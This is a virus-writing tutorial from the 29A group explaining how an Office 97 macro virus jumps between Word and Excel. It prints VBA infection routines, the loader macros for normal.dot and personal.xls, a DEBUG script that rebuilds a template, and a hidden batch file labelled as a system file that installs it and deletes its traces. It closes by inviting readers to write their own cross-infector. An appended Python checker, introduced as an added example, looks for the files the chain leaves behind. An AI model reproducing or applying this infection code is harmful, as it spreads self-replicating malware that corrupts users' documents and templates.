Cross Infection Tutorial for Office'97 PART I
─────────────────────────────────────────────────────────────────────────> Reptile/29A

Intro
─────

When I started working on Office Cross Infections I had no idea how to jump
from Word to Excel and vice versa. So I first began to research a bit on the
OLE2 format but realized that it's very complex :P and can't be done in VBA
(Visual Basic for Applications - all Office'97 programs are using this). Then
I tried to manage it with OLE Automation, but anyways this didn't work coz you
have to import sum libs manually. After more researching I found sum info on
DDE (Dynamic Data Exchange). With DDE you can send data from one application
to another. I managed to import code from Word into Excel using DDE and the
SendKeys command. But this was way too suspicious becoz the user could see it
very well. (VicodinES, Alt-F11 and I have been sharing macro ideas/code since
the beginning of the Word/Excel infecting idea... so all the cross infectors
known till now could be seen as the success of our teamwork. Now Alt-F11
finally managed to write a less suspicious DDE macro virus by using DDE
entries, gewd work man! ;)

Becoz of time pressure (mgl also wanted to be first :) I was switching from the
DDE stuff to an idea I had while lying stoned to death in my bed after reading
about the kewl import/export method - thanx again vic! The virus exports its
source to the harddisk and then dr0ps a global template (normal.dot for Word
and personal.xls for Excel) that works as loader and imports the virus source
again in the other application.

DDE vs. Strange Days method
───────────────────────────

To build your own opinion I'd recommend to first take a l00k at the Strange
Days source (dr0pping a global template) and the Shiver source (DDE) which are
included in this issue. Well, the main disadvantage of the Strange Days way is
that the virus becomes extremely huge.
The problem that it needs debug.exe to spread isn't a real problem at all coz
everyone (even NT users) got it anyways. On the other side the sucking thingy
on DDE is that you have to start the other application before opening a
channel and then you need to use the SendKeys command to force Word to import
the virus. At this moment Word pops up out of its minimized state for a short
moment and is noticeable/suspicious. Anyways don't forget to read more about
DDE in part II of the cross infection tuto (DDE could also be interesting for
other viruses)!

Basic Concept
─────────────

Here I'll try to give an overview how an infected doc file gets processed and
jumps to Excel (Excel to Word works the same way - just vice versa):

Word:                                           Excel:

+-----------------------+   1.) export virus    +--------------------------+
| INFECTED DOC FILE:    |----source to c:\----->| Lo.sys: virus source     |
|                       |                       +------------+-------------+
| virus source + loader |   3.) drop the        +--------------------------+
|                       |-------loader--------->| uninfected personal.xls: |
+-----------+-----------+                       | loader                   |
            |                                   +------------+-------------+
            | 2.) infect normal.dot                          | 4.) the next time Excel is
            v                                                |     started, personal.xls
+-----------------------+                                    |     will import Lo.sys!
| Infected normal.dot:  |                                    v
| virus source + loader |                       +--------------------------+
+-----------+-----------+                       | *Infected* personal.xls: |
            |                                   | virus source + loader    |
            v                                   +------------+-------------+
  infect more doc files                                      |
                                                             v
                                               here the whole tale begins again..

Detailed Information
────────────────────

In this section the theory will get practised and the important stuff is
explained step by step (Word to Excel only coz Excel to Word is the same thing
again, just vice versa). First you have to export the virus source code, so
the loader will l8r be able to import it into Excel.
    Application.VBE.ActiveVBProject.VBComponents("StrangeDays").Export "c:\lo.sys"

Ok, now you have to check if you are in Word or Excel. This can simply be done
this way coz in Excel there will never be an active document.

    If ActiveDocument = "" Then GoTo teonanacatl

Then check if normal.dot and the active document are infected.

    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then r = True
    Next i
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "StrangeDays" Then e = True
    Next i

If they're still clean you should infect them by using the standard
import/export infection technique to avoid the SR-2 protection.

    If e = False Then
        With ActiveDocument.VBProject
            With .VBComponents.Import("c:\lo.sys")
            End With
        End With
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
    If r = False Then
        With NormalTemplate.VBProject
            With .VBComponents.Import("c:\lo.sys")
            End With
        End With
    End If

Now you have to check if Excel is already infected. This can be done in various
ways, for example marking it in a file (like here) or in the registry.

    a = GetPrivateProfileStringA("29A", "Magic", "", b, 255, "c:\lo.idx")
    If b = "666" Then GoTo godsucks

After you're sure that Excel is not infected yet, you must use API calls to
access the registry and get the full path of Excel.

    u = RegQueryValueExA(k, "Path", 0, REG_SZ, ByVal v$, s)
    u = RegCloseKey(k)
    For e = 1 To Len(v$)
        If Mid$(v$, e, 1) = Chr$(0) Then GoTo lizard
        h$ = h$ + Mid$(v$, e, 1)
    Next e
    lizard:

Ok, now you got the path of the original personal.xls, which you have to delete
and replace with the corrupted one that imports the virus source.

    p = h$ + "\xlstart\personal.xls"
    DeleteFileA (p)
    Open "c:\a.scr" For Output As 1
    Print #1, "N PERSONAL.XLS"
    Print #1, "E 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00"
    Print #1, "E 0110 00 00 00 00 00 00 00 [...]
    Close 1

This is how the code of the personal.xls-loader looks:

===========================================================================
Module name: syaDegnartS (Macro)
---------------------------------------------------------------------------
Attribute VB_Name = "syaDegnartS"
Sub Auto_Close()
    On Error GoTo argh
    Application.DisplayAlerts = False
    Application.EnableCancelKey = xlDisabled
    For i = 1 To Workbooks("personal.xls").VBProject.VBComponents.Count
        If Workbooks("personal.xls").VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo argh
    Next i
    With Workbooks("personal.xls").VBProject
        With .VBComponents.Import("c:\lo.sys")
        End With
    End With
    Workbooks("personal.xls").Save
argh:
End Sub
===========================================================================

The code of the normal.dot-loader l00ks a bit different but does the same:

===========================================================================
Module name: syaDegnartS (Macro)
---------------------------------------------------------------------------
Attribute VB_Name = "syaDegnartS"
Sub AutoExec()
    On Error GoTo argh
    Application.DisplayAlerts = False
    Application.EnableCancelKey = wdDisabled
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo argh
    Next i
    With NormalTemplate.VBProject
        With .VBComponents.Import("c:\lo.sys")
        End With
    End With
    NormalTemplate.Save
argh:
End Sub
===========================================================================

Then you have to build a batch file that converts the debug script of
normal.dot, copies it to the Word template path and deletes all the other
files that you don't need anymore.

    Open "c:\start.bat" For Output As 1
    Print #1, "REM This is a system file. Do not edit or remove!"
    Print #1, "@echo off"
    Print #1, "c:"
    Print #1, "cd\"
    Print #1, "dir"
    Print #1, "debug < a.scr > nul"
    Print #1, "copy personal.xls " + p
    Print #1, "del a.scr"
    Print #1, "del personal.xls"
    Close 1
    Shell "c:\start.bat", vbHide

To finish the whole process, mark Excel as infected.

    c = WritePrivateProfileStringA("29A", "Magic", "666", "c:\lo.idx")

Different AutoMacros
────────────────────

In Word and Excel the automacros are different, so don't forget to add an
Excel automacro that references the Word automacro, else it won't be run.
For example this macro (and with it the virus code) is executed automatically
by Word every time a file gets closed.

    Sub AutoClose()
        (virus code)
    End Sub

This macro, on the other hand, is launched by Excel every time a file gets
opened. It then just calls the macro above (containing the virus code).

    Sub Auto_Open()
        Application.OnSheetActivate = "StrangeDays.AutoClose"
    End Sub

Cross Infector Info
───────────────────

Cross:        http://www.avp.ch/avpve/macro/xmulti/cross.stm
Strange Days: http://www.avp.ch/avpve/macro/xmulti/teocatl.stm
Shiver:       http://www.avp.ch/avpve/macro/xmulti/SHIVER.stm

Well I guess this is enough information for writing your own cross infex0r,
if I didn't forget too many details in my speedy rush.. see yah in hell,

-Reptile/29A-
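The chain described above leaves a fixed set of files on the host: the exported module c:\lo.sys, the INI marker c:\lo.idx ([29A] Magic=666), the DEBUG script c:\a.scr that rebuilds personal.xls from hex, and c:\start.bat that pipes it into debug and copies the result into xlstart. The following Python is an added example, not code from the article, that classifies file contents by exactly those indicators; the sample contents are constructed from the listings above, and the batch check assumes the article's `copy personal.xls ` + p line expanded with an xlstart path.

```python
import configparser
import re

MODULE_NAMES = {"StrangeDays", "syaDegnartS"}  # virus body and loader module names from the article
OLE2_MAGIC = "D0 CF 11 E0 A1 B1 1A E1"         # first 8 bytes of every OLE2 compound file

def exported_module_name(text):
    """Return the VB_Name of an exported VBA module, or None when the text is not one."""
    m = re.search(r'^Attribute VB_Name = "([^"]+)"', text, re.M)
    return m.group(1) if m else None

def has_infection_marker(ini_text):
    """True when the marker written with WritePrivateProfileStringA ([29A] Magic=666) is present."""
    cp = configparser.ConfigParser()
    try:
        cp.read_string(ini_text)
    except configparser.Error:          # not INI-shaped at all: no marker
        return False
    return cp.get("29A", "Magic", fallback=None) == "666"

def debug_script_writes_ole2(script_text):
    """True when a DEBUG script names an Office file and enters the OLE2 header bytes by hand."""
    names_file = re.search(r"^N\s+\S+\.(xls|doc|dot)\s*$", script_text, re.M | re.I)
    enters_magic = re.search(r"^E\s+[0-9A-F]{4}\s+" + OLE2_MAGIC, script_text, re.M | re.I)
    return bool(names_file and enters_magic)

def batch_rebuilds_template(batch_text):
    """True when a batch file pipes a script into DEBUG and copies the output into xlstart."""
    pipes_debug = re.search(r"^debug\s*<\s*\S+", batch_text, re.M | re.I)
    copies_template = re.search(r"^copy\s+\S+\s+.*\\xlstart\\", batch_text, re.M | re.I)
    return bool(pipes_debug and copies_template)

def classify(name, content):
    """List the indicators found in one file; the name only selects the INI check."""
    module = exported_module_name(content)
    hits = [f"exported VBA module '{module}'"] if module in MODULE_NAMES else []
    if name.lower().endswith(".idx") and has_infection_marker(content):
        hits.append("INI infection marker [29A] Magic=666")
    if debug_script_writes_ole2(content):
        hits.append("DEBUG script rebuilding an OLE2 document")
    if batch_rebuilds_template(content):
        hits.append("batch file converting and installing the template")
    return hits

SAMPLES = {  # constructed from the article's listings (the xlstart path is assumed)
    r"c:\lo.sys": 'Attribute VB_Name = "StrangeDays"\nSub AutoClose()\nEnd Sub\n',
    r"c:\lo.idx": "[29A]\nMagic=666\n",
    r"c:\a.scr": "N PERSONAL.XLS\nE 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00\n",
    r"c:\start.bat": "@echo off\ndebug < a.scr > nul\ncopy personal.xls C:\\Office\\xlstart\\personal.xls\n",
}
```

Running `classify(name, content)` over the four samples reports one indicator per file, and an ordinary batch file or INI without the [29A] section reports none.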